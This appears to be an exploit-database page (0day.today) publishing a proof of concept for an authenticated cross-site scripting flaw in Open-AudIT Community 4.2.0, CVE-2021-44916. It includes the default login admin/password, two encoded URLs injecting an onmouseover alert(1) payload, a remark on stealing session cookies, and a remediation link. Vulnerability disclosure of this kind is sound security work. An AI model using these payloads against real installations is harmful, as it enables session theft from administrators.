0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Open-AudIT Community 4.2.0 - Cross-Site Scripting Vulnerability
Author
Risk
[Security Risk Medium
]0day-ID
Category
Date add
CVE
Platform
# Exploit Title: Open-AudIT Community 4.2.0 - Cross-Site Scripting (XSS) (Authenticated) # Exploit Author: Dominic Clark (parzival) # Vendor Homepage: https://opmantek.com/ # Software Link: https://www.open-audit.org/downloads.php # Category: WebApps # Version: <= 4.2.0 # Tested on: Windows 10 # CVE: CVE-2021-44916 # 1. Vendor Description # Open-AudIT is an application to tell you exactly what is on your network, how it is configured and when it changes. # Essentially, Open-AudIT is a database of information, that can be queried via a web interface. # Open-AudIT will run on both Windows and Linux systems. # 2. Technical Description # There is an issue with link creation in the GUI with Open-AudIT Community. # If a bad value is passed to the routine via a URL, javascript code can be executed. # This requires the user be logged in to Open-AudIT Community to trigger. # 3. Proof of Concept # Step 1: Login to Open-AudIT via the login page (default credentials are admin/password) # Step 2: Enter one of the following PoC URLs, this issue was observed to occur any time there is a file available to be imported: (e.g., http://localhost/open-audit/index.php/attributes/import) Vulnerable URL 1: "http://localhost/open-audit/index.php/discoveries/import%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22" Vulnerable URL 2: "http://localhost/open-audit/index.php/credentials/import%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22" # Step 3: Observe that the payload successfully executes and a popup is displayed. # This vulnerability can be exploited in conjuction with a social engineering attack to potentially obtain sensitive information such a users session cookie. # 4. Remediation # Apply the recommended workarounds and mitigations provided by Opmantek. # https://community.opmantek.com/display/OA/Errata+-+4.2.0+and+earlier+Javascript+vulnerability # 0day.today [2024-11-15] #